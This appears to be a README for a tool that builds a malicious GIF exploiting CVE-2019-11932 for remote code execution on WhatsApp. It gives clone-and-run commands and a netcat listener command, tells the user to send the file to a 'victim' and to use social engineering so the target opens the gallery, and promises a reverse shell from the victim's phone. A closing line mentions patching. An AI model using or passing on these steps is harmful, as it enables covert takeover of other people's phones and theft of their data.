This is a Automated Generate Payload for CVE-2019-11932 (WhatsApp Remote Code Execution)
- Auto install GCC (no harm command, you can see this is open-source)
- Saving to .GIF file
sudo apt install git
git clone https://github.com/KeepWannabe/WhatsRCE
cd WhatsRCE && bash start.sh
- You just send the .GIF file to victim user AS A DOCUMENT NOT IMAGES
- And set the nc / netcat to port you set on the WhatsRCE tools {nc -lnvp your_port}
- You can use the Social Engineering attack so that victims can be attracted to launch this exploit
- tell the victim to open the gallery via whatsapp and send the victim to send any photos (no need, it's just got to the gallery no problem) after that a few seconds later you will receive a shell connection from the victim
or just watch this
DEMO VIDEO https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view if the above link is not accessible https://drive.google.com/open?id=1X9nBlf5oj5ef2UoYGOfusjxAiow8nKEK
- Update your whatsapp to the latest version (Patched on Version 2.19.244)
- how to receive any file including audio images and others from people we don't know